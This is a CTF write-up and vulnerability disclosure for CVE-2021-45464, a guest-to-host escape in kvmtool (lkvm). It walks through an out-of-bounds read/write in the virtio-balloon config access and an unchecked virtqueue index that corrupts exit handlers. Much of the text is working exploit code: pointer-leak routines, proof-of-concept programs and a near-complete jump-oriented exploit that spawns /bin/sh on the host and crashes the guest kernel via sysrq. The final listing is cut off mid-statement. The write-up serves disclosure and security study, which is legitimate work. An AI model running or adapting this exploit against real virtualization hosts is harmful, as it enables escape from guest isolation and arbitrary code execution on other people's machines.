Headline
CVE-2021-45464: LKVM Escape
kvmtool through 39181fc allows an out-of-bounds write, related to virtio/balloon.c and virtio/pci.c. This allows a guest OS user to execute arbitrary code on the host machine.
Overview
- Attack Surface
- Information Leak
- Getting Control of Program Flow
- Putting it all together
Writeup by: Zanderdk | linkedin
Solved by: ZZZ | linkedin, N00byedge | linkedin
Indie VMM - HXP 2021
In this challenge we are given root access to a Linux machine running inside the Linux tools hypervisor (lkvm), and the goal is to escape from the hypervisor to access the flag file on the host system. During this challenge we discovered multiple bugs, leading to a zero-day exploit for lkvm that allows an attacker with access to the guest virtual machine to execute arbitrary commands on the host machine. :-)
Throughout this writeup I will be referring to git checkout 39181fc6429f4e9e71473284940e35857b42772a of kvmtool when mentioning line numbers.
Attack Surface
As we are running inside a hypervisor with a clear separation between host and guest memory, we need a way of interacting with the host process. There is one way of communicating with the host, namely PCI. Lkvm emulates 3 hardware devices through PCI: virtio-console, virtio-net and virtio-balloon. We can interact with these devices using memory-mapped I/O, i.e. by reading and writing specific physical memory addresses. For example, if we write to an address in the range 0xd2000000-0xd20000ff (virtio-balloon), the guest is interrupted and control flow is passed to the Linux kernel KVM driver and from there to the lkvm process.
Information Leak
One of the first functions we hit when reading from this address is virtio_pci__data_in in virtio/pci.c line 148:
/*
 * Handle a guest read from the virtio-pci register window of `vdev`.
 *
 * `offset` selects the register being read; each case stores its value into
 * `data` through the ioport__write{8,16,32} helper used by that case.
 * Offsets without a dedicated case are forwarded to
 * virtio_pci__specific_data_in() and its result is returned; every dedicated
 * case returns true. `size` is only passed on to that helper.
 */
static bool virtio_pci__data_in(struct kvm_cpu *vcpu, struct virtio_device *vdev,
unsigned long offset, void *data, int size)
{
bool ret = true;
struct virtio_pci *vpci;
struct virt_queue *vq;
struct kvm *kvm;
u32 val;
kvm = vcpu->kvm;
vpci = vdev->virtio;
switch (offset) {
case VIRTIO_PCI_HOST_FEATURES:
val = vdev->ops->get_host_features(kvm, vpci->dev);
ioport__write32(data, val);
break;
case VIRTIO_PCI_QUEUE_PFN:
/* The queue is looked up with the current queue_selector, used as-is. */
vq = vdev->ops->get_vq(kvm, vpci->dev, vpci->queue_selector);
ioport__write32(data, vq->pfn);
break;
case VIRTIO_PCI_QUEUE_NUM:
val = vdev->ops->get_size_vq(kvm, vpci->dev, vpci->queue_selector);
ioport__write16(data, val);
break;
case VIRTIO_PCI_STATUS:
ioport__write8(data, vpci->status);
break;
case VIRTIO_PCI_ISR:
/* Report the stored ISR value, then lower the IRQ line and reset isr. */
ioport__write8(data, vpci->isr);
kvm__irq_line(kvm, vpci->legacy_irq_line, VIRTIO_IRQ_LOW);
vpci->isr = VIRTIO_IRQ_LOW;
break;
default:
/* Everything else (MSI-X registers, device config) is decoded by the helper. */
ret = virtio_pci__specific_data_in(kvm, vdev, data, size, offset);
break;
};
return ret;
}
This function switches on the offset into the BAR (address range), meaning that if we, for example, read at address 0xd2000000 + VIRTIO_PCI_QUEUE_PFN == 0xd2000008 we will hit the second switch case. Here the default case is very interesting. The default case calls virtio_pci__specific_data_in on line 118:
/*
 * Handle guest reads at offsets that virtio_pci__data_in() has no case for.
 *
 * virtio__get_dev_specific_field() classifies (offset - 20) and fills in
 * config_offset. For VIRTIO_PCI_O_MSIX the selected MSI-X vector register is
 * written to `data`; for VIRTIO_PCI_O_CONFIG one byte of the device config
 * returned by ops->get_config() is written to `data`.
 *
 * Returns true for those two types and false otherwise.
 */
static bool virtio_pci__specific_data_in(struct kvm *kvm, struct virtio_device *vdev,
void *data, int size, unsigned long offset)
{
u32 config_offset;
struct virtio_pci *vpci = vdev->virtio;
int type = virtio__get_dev_specific_field(offset - 20,
virtio_pci__msix_enabled(vpci),
&config_offset);
if (type == VIRTIO_PCI_O_MSIX) {
/* Offsets matching neither case write nothing but still return true. */
switch (offset) {
case VIRTIO_MSI_CONFIG_VECTOR:
ioport__write16(data, vpci->config_vector);
break;
case VIRTIO_MSI_QUEUE_VECTOR:
/* vq_vector is indexed with queue_selector as-is. */
ioport__write16(data, vpci->vq_vector[vpci->queue_selector]);
break;
};
return true;
} else if (type == VIRTIO_PCI_O_CONFIG) {
u8 cfg;
/* NOTE: config_offset is not compared against the config size here. */
cfg = vdev->ops->get_config(kvm, vpci->dev)[config_offset];
ioport__write8(data, cfg);
return true;
}
return false;
}
Here we will always end up in the else if case, as this is not MSI-X. config_offset is calculated based on the offset passed from virtio_pci__data_in, and we see that it is used as an array index completely without any bounds checks. The value of config_offset is calculated as an output parameter of the call to virtio__get_dev_specific_field. When we are not doing an MSI-X operation, config_offset is simply set to the value of the first parameter passed to virtio__get_dev_specific_field, which is offset - 20.
So far we have only been looking at generic virtio and PCI functions, but here ops->get_config is called, which fetches the u8 * config from the balloon driver in this case. This function is just a simple getter and looks like this:
/*
 * Return the balloon device's config struct as a raw byte pointer.
 * `dev` is treated as a struct bln_dev; `kvm` is not used.
 */
static u8 *get_config(struct kvm *kvm, void *dev)
{
struct bln_dev *bdev = dev;
return ((u8 *)(&bdev->config));
}
As we can see below, virtio_balloon_config is the last element of the struct and, as the observant reader might have noticed, the config struct is very small. As the BAR is 0x100 bytes big (0xd2000000-0xd20000ff), as soon as we set offset to 20 or higher we access the config struct, and we can go beyond it since 0x100 > 20 + sizeof(virtio_balloon_config). A similar write-to-config function exists for writes to this BAR, meaning that we have an out-of-bounds read/write primitive here.
/*
 * State of one virtio balloon device.
 * `config` is the final member, so byte offsets from get_config() that exceed
 * sizeof(config) run past the end of this struct.
 */
struct bln_dev {
struct list_head list;
struct virtio_device vdev;
u32 features;
/* virtio queue */
/* vqs and jobs are both indexed by the queue number (see init_vq()). */
struct virt_queue vqs[NUM_VIRT_QUEUES];
struct thread_pool__job jobs[NUM_VIRT_QUEUES];
struct virtio_balloon_stat stats[VIRTIO_BALLOON_S_NR];
struct virtio_balloon_stat *cur_stat;
u32 cur_stat_head;
u16 stat_count;
int stat_waitfd;
/* Device config exposed byte-wise through get_config(). */
struct virtio_balloon_config config;
};
/* Balloon device configuration: four __le32-sized fields, one of them a union. */
struct virtio_balloon_config {
/* Number of pages host wants Guest to give up. */
__le32 num_pages;
/* Number of pages we've actually got in balloon. */
__le32 actual;
/*
 * Free page hint command id, readonly by guest.
 * Was previously named free_page_report_cmd_id so we
 * need to carry that name for legacy support.
 */
union {
__le32 free_page_hint_cmd_id;
__le32 free_page_report_cmd_id; /* deprecated */
};
/* Stores PAGE_POISON if page poisoning is in use */
__le32 poison_val;
};
This memory is not stored on the stack but rather in a fairly uninteresting mmapped area. This means that we were not able to get control of the program flow by smashing this memory area. However, we were able to leak information with this bug: two pointers of interest were leaked, namely an address of the bln_dev structure itself and an address revealing the base address of the lkvm binary.
To execute this leaking from a userspace process we use /dev/mem to access the physical memory of the guest and in code it looks something like this:
/* Start of the mapped device window; every accessor below offsets from it. */
char *mmio_mem;

/* Read one byte at byte offset `off` with a single volatile load. */
u8 ioread8(u64 off)
{
    volatile uint8_t *reg = (volatile uint8_t *)(mmio_mem + off);

    return *reg;
}

/* Read 16 bits at byte offset `off` with a single volatile load. */
u16 ioread16(u64 off)
{
    volatile uint16_t *reg = (volatile uint16_t *)(mmio_mem + off);

    return *reg;
}

/* Read 32 bits at byte offset `off` with a single volatile load. */
u32 ioread32(u64 off)
{
    volatile uint32_t *reg = (volatile uint32_t *)(mmio_mem + off);

    return *reg;
}

/* Store one byte at byte offset `off` with a single volatile store. */
void iowrite8(u64 off, u8 val)
{
    volatile uint8_t *reg = (volatile uint8_t *)(mmio_mem + off);

    *reg = val;
}

/* Store 16 bits at byte offset `off` with a single volatile store. */
void iowrite16(u64 off, u16 val)
{
    volatile uint16_t *reg = (volatile uint16_t *)(mmio_mem + off);

    *reg = val;
}

/* Store 32 bits at byte offset `off` with a single volatile store. */
void iowrite32(u64 off, u32 val)
{
    volatile uint32_t *reg = (volatile uint32_t *)(mmio_mem + off);

    *reg = val;
}
/*
 * Assemble a 64-bit value from eight consecutive byte reads of the device
 * window, starting 20 bytes in (where the device-specific config begins)
 * plus `off`. Bytes are stored in memory order, so the result has host
 * byte order.
 */
u64 leak_u64(u64 off) {
    const u64 first = 20 + off;
    u64 value;
    unsigned char *out = (unsigned char *)&value;

    for (u64 n = 0; n < 8; n++)
        out[n] = ioread8(first + n);

    return value;
}
/*
 * Information-leak demo: map the virtio-balloon BAR (guest-physical
 * 0xd2000000) through /dev/mem and print the 8 bytes that leak_u64() reads
 * at config offset 0x44.
 *
 * Returns EXIT_FAILURE if /dev/mem cannot be opened or mapped, so that a
 * failed mmap() is never dereferenced.
 */
int main(void)
{
    int mem_fd = open("/dev/mem", O_RDWR);
    if (mem_fd == -1) {
        perror("open /dev/mem");
        return EXIT_FAILURE;
    }

    mmio_mem = mmap((void *)0x1337000, 0x1000, PROT_READ | PROT_WRITE, MAP_SHARED, mem_fd, 0xd2000000);
    if (mmio_mem == MAP_FAILED) {
        perror("mmap");
        close(mem_fd);
        return EXIT_FAILURE;
    }

    u64 lkvm_leak = leak_u64(0x44);
    printf("lkvm leak: %p\n", (void *)lkvm_leak);
    return EXIT_SUCCESS;
}
Here leak_u64 uses ioread8 to read from the mmapped /dev/mem area at 0xd2000000, where the virtio-balloon device is located. We skip the first 20 bytes and add an out-of-bounds offset to reach the address pointing into the lkvm executable, and boom, we have our information leak. The same procedure can be repeated for the bln_dev leak.
Getting Control of Program Flow
Now to the fun part: let's get that rip control. Let's for a second assume that we could use the previous bug to write arbitrary data out of bounds; what interesting data could we corrupt? In the picture below I have set a breakpoint in the virtio_pci__specific_data_in function to inspect the bln_dev memory. Here I have dumped the memory following the config struct. We see some structures called exit_lists, which unfortunately are out of reach due to the 0x100 limitation. But what are they?
When the lkvm binary closes, it executes a teardown process that involves calling some exit handlers, and this is what we find here. If we look inside init.c at line 51 we find this lovely piece of code:
/*
 * Run the registered exit handlers.
 *
 * Walks exit_lists from its last index down to index 0 and calls the init
 * callback of every entry with `kvm`. Stops at the first callback that
 * returns a negative value, logs that entry's fn_name and returns the value.
 * Otherwise returns the result of the last callback run (0 if none ran).
 */
int init_list__exit(struct kvm *kvm)
{
int i;
int r = 0;
struct init_item *t;
for (i = ARRAY_SIZE(exit_lists) - 1; i >= 0; i--)
hlist_for_each_entry(t, &exit_lists[i], n) {
/* Indirect call through the function pointer stored in the list entry. */
r = t->init(kvm);
if (r < 0) {
pr_warning("%s failed.\n", t->fn_name);
goto fail;
}
}
fail:
return r;
}
Here we see that upon exiting, lkvm loops over an array of lists of struct init_item and calls the function t->init on each element, starting from the last element in the array. This is the exit_lists from before. Each entry in the list is a pointer to an init_item (this struct is also used during initialization, hence the name). If we can control one of these pointers, we can potentially construct a fake init_item and change the program flow when terminating the guest OS.
/* List linkage embedded in init_item: two pointer-sized fields. */
struct hlist_node {
struct hlist_node *next, **pprev;
};
/* One entry of the init/exit handler lists walked by init_list__exit(). */
struct init_item {
struct hlist_node n;
/* Name printed by init_list__exit() when the callback fails. */
const char *fn_name;
/* Callback; preceded by three pointers, i.e. at offset 0x18 with 8-byte pointers. */
int (*init)(struct kvm *);
};
Looking at the struct definition of init_item above, we see that it is pretty simple: it contains 2 linked-list pointers, a name pointer and the actual function pointer we want control of, at offset 0x18 from the top of struct init_item.
Now if you remember we also had other functionality in the virtio_pci__data_in function than just the read and write from config. Let’s have a look at the data_out equivalent of this function in virtio/pci.c line 287:
/*
 * Handle a guest write to the virtio-pci register window of `vdev`.
 *
 * `offset` selects the register and the written value is fetched from `data`
 * with the ioport__read{8,16,32} helper used by that case. Offsets without a
 * dedicated case are forwarded to virtio_pci__specific_data_out() and its
 * result is returned; every dedicated case returns true.
 */
static bool virtio_pci__data_out(struct kvm_cpu *vcpu, struct virtio_device *vdev,
unsigned long offset, void *data, int size)
{
bool ret = true;
struct virtio_pci *vpci;
struct kvm *kvm;
u32 val;
kvm = vcpu->kvm;
vpci = vdev->virtio;
switch (offset) {
case VIRTIO_PCI_GUEST_FEATURES:
val = ioport__read32(data);
virtio_set_guest_features(kvm, vdev, vpci->dev, val);
break;
case VIRTIO_PCI_QUEUE_PFN:
/* Non-zero PFN: set up the selected queue; zero: tear it down. */
val = ioport__read32(data);
if (val) {
virtio_pci__init_ioeventfd(kvm, vdev,
vpci->queue_selector);
/* queue_selector and the guest-written PFN are handed to the device as-is. */
vdev->ops->init_vq(kvm, vpci->dev, vpci->queue_selector,
1 << VIRTIO_PCI_QUEUE_ADDR_SHIFT,
VIRTIO_PCI_VRING_ALIGN, val);
} else {
virtio_pci_exit_vq(kvm, vdev, vpci->queue_selector);
}
break;
case VIRTIO_PCI_QUEUE_SEL:
/* The 16-bit value is stored without any range check in this function. */
vpci->queue_selector = ioport__read16(data);
break;
case VIRTIO_PCI_QUEUE_NOTIFY:
val = ioport__read16(data);
vdev->ops->notify_vq(kvm, vpci->dev, val);
break;
case VIRTIO_PCI_STATUS:
vpci->status = ioport__read8(data);
if (!vpci->status) /* Sample endianness on reset */
vdev->endian = kvm_cpu__get_endianness(vcpu);
virtio_notify_status(kvm, vdev, vpci->dev, vpci->status);
break;
default:
ret = virtio_pci__specific_data_out(kvm, vdev, data, size, offset);
break;
};
return ret;
}
Here the second case for VIRTIO_PCI_QUEUE_PFN is rather interesting as this calls the virtio-balloon specific init virtual queue function. We can find this function in virtio/balloon.c at line 200. Below i have shown all of the relevant functions in one listing:
//balloon.c line 200
/*
 * Set up balloon virtqueue number `vq`: record `pfn`, translate it to a host
 * pointer, register the I/O job for the queue and initialise its vring.
 * Always returns 0.
 */
static int init_vq(struct kvm *kvm, void *dev, u32 vq, u32 page_size, u32 align,
u32 pfn)
{
struct bln_dev *bdev = dev;
struct virt_queue *queue;
void *p;
compat__remove_message(compat_id);
/* NOTE: vq indexes bdev->vqs (and bdev->jobs below) with no range check here. */
queue = &bdev->vqs[vq];
queue->pfn = pfn;
/* p is the host address corresponding to guest address pfn * page_size. */
p = virtio_get_vq(kvm, queue->pfn, page_size);
thread_pool__init_job(&bdev->jobs[vq], kvm, virtio_bln_do_io, queue);
vring_init(&queue->vring, VIRTIO_BLN_QUEUE_SIZE, p, align);
virtio_init_device_vq(&bdev->vdev, queue);
return 0;
}
//virtio.h line 214
/*
 * Translate a queue page frame number into a host pointer: the guest address
 * is pfn * page_size (computed in 64 bits) and is mapped with
 * guest_flat_to_host().
 */
static inline void *virtio_get_vq(struct kvm *kvm, u32 pfn, u32 page_size)
{
return guest_flat_to_host(kvm, (u64)pfn * page_size);
}
//virtio_ring.h line 191
/*
 * Fill in `vr` for a ring of `num` entries laid out in the memory at `p`:
 * descriptors start at p, the avail ring follows the num descriptors, and the
 * used ring follows the avail ring, rounded up to `align`.
 * Only pointers are computed; the memory at p is not accessed here.
 */
static __inline__ void vring_init(struct vring *vr, unsigned int num, void *p,
unsigned long align)
{
vr->num = num;
vr->desc = p;
vr->avail = (struct vring_avail *)((char *)p + num * sizeof(struct vring_desc));
/* Round-up uses a mask, which presumably expects align to be a power of two. */
vr->used = (void *)(((uintptr_t)&vr->avail->ring[num] + sizeof(__virtio16)
+ align-1) & ~(align - 1));
}
As we can see, when vring_init is called it sets vr->desc = p, which is a void * to a guest physical page whose content we fully control. We can see this because vring_init is called from init_vq with p as an argument, and p is obtained from virtio_get_vq, which finds the host virtual address for a given page frame number (pfn). In init_vq we see that the parameter vq is used to calculate the offset into the bdev->vqs array. This queue = &bdev->vqs[vq]; statement is again completely without any bounds checks, although there are only 3 queues at any given time. This means that if we control the vq parameter, we can effectively insert a pointer to guest memory out of bounds.
In the listing for virtio_pci__data_out the call to init_vq is passed vpci->queue_selector as the argument for vq and in the same listing we also find that we control vpci->queue_selector entirely using the VIRTIO_PCI_QUEUE_SEL case in the switch statement.
Looking at the struct definition of the vring *vr below, we see that it has 4 members and a size of 0x20, meaning we can't insert this pointer at arbitrary locations, but only at offset 0x20*x + 8, where we fully control x.
//virtio_ring.h line 143
/* Aligned aliases for the three ring element types referenced by struct vring. */
typedef struct vring_desc __attribute__((aligned(VRING_DESC_ALIGN_SIZE)))
vring_desc_t;
typedef struct vring_avail __attribute__((aligned(VRING_AVAIL_ALIGN_SIZE)))
vring_avail_t;
typedef struct vring_used __attribute__((aligned(VRING_USED_ALIGN_SIZE)))
vring_used_t;
/* Ring size plus pointers to its three parts; all four are set by vring_init(). */
struct vring {
unsigned int num;
/* Set to the caller-supplied ring memory pointer by vring_init(). */
vring_desc_t *desc;
vring_avail_t *avail;
vring_used_t *used;
};
If you recall from before, the exit_lists were not far from the location of this bdev struct, and now we have an unbounded pointer-insertion primitive. It just so happens that if we set vq to 0x16 we end up inserting this pointer in the last entry of exit_lists. In code this looks like so:
/* A 32-bit r/w PFN for the currently selected queue */
#define VIRTIO_PCI_QUEUE_PFN 8
/* A 16-bit r/w queue selector */
#define VIRTIO_PCI_QUEUE_SEL 14
/* Start of the mapped device window; every accessor below offsets from it. */
char *mmio_mem;

/* Read one byte at byte offset `off` with a single volatile load. */
u8 ioread8(u64 off)
{
    volatile uint8_t *reg = (volatile uint8_t *)(mmio_mem + off);

    return *reg;
}

/* Read 16 bits at byte offset `off` with a single volatile load. */
u16 ioread16(u64 off)
{
    volatile uint16_t *reg = (volatile uint16_t *)(mmio_mem + off);

    return *reg;
}

/* Read 32 bits at byte offset `off` with a single volatile load. */
u32 ioread32(u64 off)
{
    volatile uint32_t *reg = (volatile uint32_t *)(mmio_mem + off);

    return *reg;
}

/* Store one byte at byte offset `off` with a single volatile store. */
void iowrite8(u64 off, u8 val)
{
    volatile uint8_t *reg = (volatile uint8_t *)(mmio_mem + off);

    *reg = val;
}

/* Store 16 bits at byte offset `off` with a single volatile store. */
void iowrite16(u64 off, u16 val)
{
    volatile uint16_t *reg = (volatile uint16_t *)(mmio_mem + off);

    *reg = val;
}

/* Store 32 bits at byte offset `off` with a single volatile store. */
void iowrite32(u64 off, u32 val)
{
    volatile uint32_t *reg = (volatile uint32_t *)(mmio_mem + off);

    *reg = val;
}
/*
 * Program the page frame number of queue `index`.
 * The selector register is written first so that the following PFN write
 * applies to that queue.
 */
void vp_legacy_set_queue_address(u16 index, u32 queue_pfn)
{
    const u64 selector_reg = VIRTIO_PCI_QUEUE_SEL;
    const u64 pfn_reg = VIRTIO_PCI_QUEUE_PFN;

    iowrite16(selector_reg, index);
    iowrite32(pfn_reg, queue_pfn);
}
/*
 * Control-flow demo: fill guest-physical page 1 with 'A', register that page
 * as the ring of queue 0x16 on the balloon device, then crash the guest
 * kernel through sysrq.
 *
 * Both mappings come from a single /dev/mem descriptor. Returns EXIT_FAILURE
 * if /dev/mem cannot be opened or mapped, so that memset() never runs on a
 * failed mapping.
 */
int main(void)
{
    int mem_fd = open("/dev/mem", O_RDWR);
    if (mem_fd == -1) {
        perror("open /dev/mem");
        return EXIT_FAILURE;
    }

    /* Balloon BAR at guest-physical 0xd2000000. */
    mmio_mem = mmap((void *)0x1337000, 0x1000, PROT_READ | PROT_WRITE, MAP_SHARED, mem_fd, 0xd2000000);
    if (mmio_mem == MAP_FAILED) {
        perror("mmap BAR");
        close(mem_fd);
        return EXIT_FAILURE;
    }

    /* Guest-physical address 0x1000, i.e. page frame number 1. */
    void *guest_page = mmap((void *)0x0, 0x1000, PROT_READ | PROT_WRITE, MAP_SHARED, mem_fd, 1 << 12);
    if (guest_page == MAP_FAILED) {
        perror("mmap guest page");
        close(mem_fd);
        return EXIT_FAILURE;
    }
    memset(guest_page, 'A', 0x200);

    vp_legacy_set_queue_address(0x16, 0x1);

    if (system("echo c > /proc/sysrq-trigger") == -1) {
        perror("system");
        return EXIT_FAILURE;
    }
    return EXIT_SUCCESS;
}
Here we set the page frame number to 0x1, meaning guest physical address 0x1000, and again use /dev/mem to map the physical address 0x1000 to an address in the userspace process that we can manipulate. Apparently rebooting or exiting the guest OS in any sane way did not cause these exit handlers to be called, but luckily crashing the kernel on an undefined instruction does :D So that is the reason for the ugly as fuck echo c > /proc/sysrq-trigger.
Memory dump before exiting:
Here we see all the 'A's inserted by the memset above appearing at the address inside exit_lists+72, and it is obvious that we now control the program flow, as t->init(kvm) calls this address that we fully control. Sweet, now we have that rip control and can redirect program flow.
Now we need a target to redirect execution to in order to run code or commands on the host system. Luckily this binary basically has a ret-to-own function, virtio_net_exec_script:
Now if we can control the $rdi register and jump to the instruction marked by the red arrow in virtio_net_exec_script, we effectively call execl(command_we_control, …) and execute a command on the host system.
Putting it all together
Now we have all the necessary parts to construct a fake init_item launching a ROP chain that calls execl, or rather a JOP chain, as from here on we rely heavily on jump-oriented programming. To summarize: we now have a leak using the first bug, as well as the ability to control some of the bytes in that area, since we can also write to the area we leak from. And we have a way of getting rip control, but unfortunately we don't control any of the arguments to this function call: kvm in t->init(kvm) is not within the same mmap slide.
When we first do the initial call to t->init, $rbx points to our fake init_item, i.e. memory we control.
First we jump to this gadget: mov rax, qword ptr [rbx + 0x28]; mov rdi, rbx; mov rsi, qword ptr [rax + 8]; call qword ptr [rax];
This moves $rbx into $rdi, allowing us to control the first argument of any function call, and again fetches a new location to jump to from [$rbx + 0x28].
And now we can just jump to the super awesome gadget from before, as we now have $rdi control.
Now this calls execl("/bin/sh", "", null); and we get a shell back :D We have registered CVE-2021-45464, which is currently reserved and waiting for approval. Here is the full exploit code, but be aware that it will not work out of the box for every version of lkvm: the gadget offsets have to be changed for the specific binary:
#include <sys/ioctl.h>
#include <fcntl.h>
#include <sys/klog.h>
#include <unistd.h>
#include <time.h>
#include <sys/shm.h>
#include <sys/timerfd.h>
#include <poll.h>
#include <sys/types.h>
#include <sys/syscall.h>
#include <sys/wait.h>
#include <time.h>
#include <errno.h>
#include <sys/msg.h>
#include <dirent.h>
#include <sys/sendfile.h>
#include <sys/resource.h>
#include <stdint.h>
#include <string.h>
#include <stdio.h>
#include <sys/socket.h>
#include <stdlib.h>
#include <sys/mman.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <sys/syscall.h> /* Definition of SYS_* constants */
#include <unistd.h>
#include <sys/reboot.h> /* Definition of RB_* constants */
/*
 * Short aliases for the <stdint.h> fixed-width unsigned types.
 * Declared as typedefs rather than macros so they are real type names that
 * obey scope and cannot be textually substituted inside other identifiers
 * or declarations.
 */
typedef uint64_t u64;
typedef uint32_t u32;
typedef uint16_t u16;
typedef uint8_t u8;
/*
 * Set the real/effective user and group IDs to 0 and replace the current
 * process with /bin/sh (empty environment). Return values of the set*id
 * calls and of execve are not checked.
 */
void shell(void)
{
    char *argv[] = {"/bin/sh", NULL};

    setuid(0);
    setgid(0);
    setreuid(-1, 0);
    setregid(-1, 0);

    execve(argv[0], argv, NULL);
}
/*
 * Byte offsets of the common virtio-pci registers inside the device window;
 * these are the values the accessors below are called with.
 */
/* A 32-bit r/o bitmask of the features supported by the host */
#define VIRTIO_PCI_HOST_FEATURES 0
/* A 32-bit r/w bitmask of features activated by the guest */
#define VIRTIO_PCI_GUEST_FEATURES 4
/* A 32-bit r/w PFN for the currently selected queue */
#define VIRTIO_PCI_QUEUE_PFN 8
/* A 16-bit r/o queue size for the currently selected queue */
#define VIRTIO_PCI_QUEUE_NUM 12
/* A 16-bit r/w queue selector */
#define VIRTIO_PCI_QUEUE_SEL 14
/* A 16-bit r/w queue notifier */
#define VIRTIO_PCI_QUEUE_NOTIFY 16
/* An 8-bit device status register. */
#define VIRTIO_PCI_STATUS 18
/* An 8-bit r/o interrupt status register. Reading the value will return the
* current contents of the ISR and will also clear it. This is effectively
* a read-and-acknowledge. */
#define VIRTIO_PCI_ISR 19
/* Start of the mapped device window; every accessor below offsets from it. */
char *mmio_mem;
/* Receives the value loaded by MMIO_READ(). */
size_t mmio_result;

/* 64-bit volatile store/load helpers; note that both expansions end in ';'. */
#define MMIO_WRITE(addr, value) (*((volatile u64 *)(mmio_mem + (addr))) = (value));
#define MMIO_READ(addr) (mmio_result = *((volatile u64 *)(mmio_mem + (addr))));

/* Read one byte at byte offset `off` with a single volatile load. */
u8 ioread8(u64 off)
{
    volatile uint8_t *reg = (volatile uint8_t *)(mmio_mem + off);

    return *reg;
}

/* Read 16 bits at byte offset `off` with a single volatile load. */
u16 ioread16(u64 off)
{
    volatile uint16_t *reg = (volatile uint16_t *)(mmio_mem + off);

    return *reg;
}

/* Read 32 bits at byte offset `off` with a single volatile load. */
u32 ioread32(u64 off)
{
    volatile uint32_t *reg = (volatile uint32_t *)(mmio_mem + off);

    return *reg;
}

/* Store one byte at byte offset `off` with a single volatile store. */
void iowrite8(u64 off, u8 val)
{
    volatile uint8_t *reg = (volatile uint8_t *)(mmio_mem + off);

    *reg = val;
}

/* Store 16 bits at byte offset `off` with a single volatile store. */
void iowrite16(u64 off, u16 val)
{
    volatile uint16_t *reg = (volatile uint16_t *)(mmio_mem + off);

    *reg = val;
}

/* Store 32 bits at byte offset `off` with a single volatile store. */
void iowrite32(u64 off, u32 val)
{
    volatile uint32_t *reg = (volatile uint32_t *)(mmio_mem + off);

    *reg = val;
}
/*
 * Assemble a 64-bit value from eight consecutive byte reads of the device
 * window, starting 20 bytes in (where the device-specific config begins)
 * plus `off`. Bytes are stored in memory order, so the result has host
 * byte order.
 */
u64 leak_u64(u64 off) {
    const u64 first = 20 + off;
    u64 value;
    unsigned char *out = (unsigned char *)&value;

    for (u64 n = 0; n < 8; n++)
        out[n] = ioread8(first + n);

    return value;
}
/*
 * Program the page frame number of queue `index`.
 * The selector register is written first so that the following PFN write
 * applies to that queue.
 */
void vp_legacy_set_queue_address(u16 index, u32 queue_pfn)
{
    const u64 selector_reg = VIRTIO_PCI_QUEUE_SEL;
    const u64 pfn_reg = VIRTIO_PCI_QUEUE_PFN;

    iowrite16(selector_reg, index);
    iowrite32(pfn_reg, queue_pfn);
}
/*
 * Driver for the full listing. Steps, in order:
 *   1. read and print the first address in the PCI "resource" file,
 *   2. map resource1, then map the balloon BAR through /dev/mem (the
 *      accessors use the latter),
 *   3. read and print the leaked values and the addresses derived from them,
 *   4. register guest page 1 as the ring of queue 0x16,
 *   5. write buf2 into the device window and fill guest page 1,
 *   6. crash the guest kernel through sysrq.
 *
 * The offsets added to the leaked values are specific to one lkvm build.
 * Exits with EXIT_FAILURE if a file cannot be opened, read or mapped.
 */
int main(void)
{
    char buf[0x1000];
    unsigned long long parsed = 0;
    u64 pic_addr = 0;
    // shell();

    int fd = open("/sys/devices/pci0000:00/0000:00:00.0/resource", O_RDONLY);
    if (fd == -1) {
        perror("open");
        exit(EXIT_FAILURE);
    }
    memset(buf, 0, sizeof(buf));
    /* Read at most sizeof(buf) - 1 bytes so buf stays NUL-terminated for sscanf. */
    ssize_t got = read(fd, buf, sizeof(buf) - 1);
    close(fd);
    if (got < 0) {
        perror("read");
        exit(EXIT_FAILURE);
    }
    /* %llx accepts an optional 0x prefix and matches the integer type used. */
    if (sscanf(buf, "%llx", &parsed) == 1)
        pic_addr = parsed;
    printf("PIC address: %p\n", (void *)(uintptr_t)pic_addr);

    int mmio_fd = open("/sys/devices/pci0000:00/0000:00:00.0/resource1", O_RDWR | O_SYNC);
    if (mmio_fd == -1) {
        perror("open");
        exit(EXIT_FAILURE);
    }
    mmio_mem = mmap((void *)0xabc0000, 0x1000, PROT_READ | PROT_WRITE, MAP_SHARED, mmio_fd, 0x0);
    if (mmio_mem == MAP_FAILED) {
        perror("mmap");
        exit(EXIT_FAILURE);
    }
    printf("mmio_mem: %p\n", (void *)mmio_mem);

    /*
     * From here on the accessors use the /dev/mem mapping of the balloon BAR;
     * the resource1 mapping above stays mapped but is no longer referenced.
     */
    int mem_fd = open("/dev/mem", O_RDWR);
    if (mem_fd == -1) {
        perror("open /dev/mem");
        exit(EXIT_FAILURE);
    }
    mmio_mem = mmap((void *)0x1337000, 0x1000, PROT_READ | PROT_WRITE, MAP_SHARED, mem_fd, 0xd2000000);
    if (mmio_mem == MAP_FAILED) {
        perror("mmap BAR");
        exit(EXIT_FAILURE);
    }
    printf("%p\n", (void *)mmio_mem);

    u64 lkvm_leak = leak_u64(0x44);
    printf("lkvm_leak %p\n", (void *)lkvm_leak);
    u64 dumb_heap = leak_u64(0x34);
    printf("dumb heap %p\n", (void *)dumb_heap);
    u64 guest_leak = leak_u64(0xd0);
    printf("guest_leak %p\n", (void *)guest_leak);
    u64 r8 = dumb_heap - 0x210 + 0x20;
    printf("r8 %p\n", (void *)r8);
    u64 base = lkvm_leak - 0x192f0;
    printf("dumb base %p\n", (void *)base);
    u64 guest_space = 0x2a7d7ae5ec40 + r8;
    printf("shit!!!!: %p\n", (void *) guest_space);

    /* All addresses derived from base are defined here, before their first use. */
    u64 exec_gadget = base + 0x0157C0;
    u64 jop_gadget_1 = base + 0x000000000000ce9c;
    u64 execl_gadget = base + 0x15847;
    (void)exec_gadget; /* computed but not referenced below */

    vp_legacy_set_queue_address(0x16, 0x1);

    /* buf2 is written byte-wise to window offsets 24 .. 24 + sizeof(buf2) - 1. */
    char buf2[0xb0];
    memset(buf2, 0x51, sizeof(buf2));
    /* memcpy instead of a u64 store through a cast: buf2 has no 8-byte alignment guarantee. */
    memcpy(buf2 + 0x8, &execl_gadget, sizeof(execl_gadget));
    for (size_t i = 0; i < sizeof(buf2); i++)
        iowrite8(24 + i, (u8)buf2[i]);

    /* Guest-physical address 0x1000, i.e. the page frame number passed above. */
    void *guest_page = mmap((void *)0x0, 0x1000, PROT_READ | PROT_WRITE, MAP_SHARED, mem_fd, 1 << 12);
    if (guest_page == MAP_FAILED) {
        perror("mmap guest page");
        exit(EXIT_FAILURE);
    }
    memset(guest_page, 'A', 0x200);
    strcpy(guest_page, "/bin/sh");
    /* 0x18 is the offset of the init callback inside struct init_item. */
    u64 *jop1 = (u64 *)guest_page;
    jop1[0x18/8] = jop_gadget_1;

    if (system("echo c > /proc/sysrq-trigger") == -1) {
        perror("system");
